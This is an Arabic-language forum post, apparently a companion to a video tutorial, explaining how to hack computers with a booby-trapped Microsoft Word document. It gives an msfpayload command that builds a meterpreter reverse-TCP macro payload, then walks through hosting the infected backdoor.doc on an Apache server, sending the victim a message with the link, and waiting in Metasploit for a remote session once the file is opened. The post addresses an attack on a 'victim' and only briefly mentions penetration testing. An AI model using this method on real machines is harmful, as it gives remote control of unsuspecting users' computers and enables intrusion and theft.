هده طريقة لاختراق الحواسيب عن طريق ملفات ال Microsoft office
لرؤية الشرح بالصورة و الصوت مباشرة هنا
http://blip.tv/jac0bn3t/office-files...cripts-5370003
للتحميل الشرح هنا
http://blip.tv/file/get/Jac0bn3t-off...Scripts859.mp4
بعد رؤية الشرح المرجو قراءة هدا الموضوع
ما قمت باستخدامه :
samba client
metasploit
OS:backtrack 5 linux and Win SP2 and SP3
Microsoft office word 2003
camtasia video recording and editing
سنقسم الشرح الى خطوتين:
الخطوة الأولى:اعداد الباكدوور و تلغيمه
سوف احتاج الى Win XP helper maching and Microsoft office للعمل حقن لملف (doc.)
كيف سنقوم بالحقن *:
سنعد Visual basic script عن طريق Metasploite باستعمال ال Command
التالية:
msfpayload windows/meterpreter/reverse_tcp lhost=0.0.0.0
lport=8080 -e shakita_ga_nai V
تم وضعنا ال Visual basic script في ملف VBS.txt في
/var/www/vbs.txt
سوف تتسألون لمادا وضعنها في هدا الملف /var/www
هدا الملف خاص بالوب لتكون مشاطرة Visual basic script
سهلة بين ال backtrack 5 و Win XP helper maching
بحيت قمت ببدأ apache2 server
و أصبح الملف VBS.txt
الذي فيه ال Visual basic script قابل للتحميل من أي حاسوب
بعد تلغيم الملف (.doc) الدي سميته backdoor(لتسهيل الشرح)
كيف تم التلغيم الملف الشرح في الفيديو من الدقيقة 6:00 إلى 7:16
علما ان ال Port :445 مفتوحة على ال Win XP helper maching قمت بوضع ملف الملغم backdoor.doc
في ملف منقسم مع ال Network أي *.*.192.168
وإ ستعملت ال samba client من اجل الدخول إلى الملف المقاسم تم قمنا بعمل
cp
أي copier coler للملف الملغم الى var/www/backdoor.doc
من اجل مشاطرته مع الضحية
قمنا بإرسال رسالة الى الضحية مع IP الخاصة بال apache2 server
قمنا بعمل listining بال metasploite
لل Port and ip لقمنا باستعمالها لإنشاء ال PAYLOAD
و ننتضر الضحية
بعد ان يقرأ الضحية الرسالة و يحمل الملف الملغم و يفته سوف نحصل على meterpreter session
وهدا كل شيء
الموسيقا المستعملة :infected mushrooml-saaed
and
illuson dj markitos
وضعت الدرس في قسم ال penetration testing أيضا لوجود علاقة بين الدرس و ال pentration
office client side attack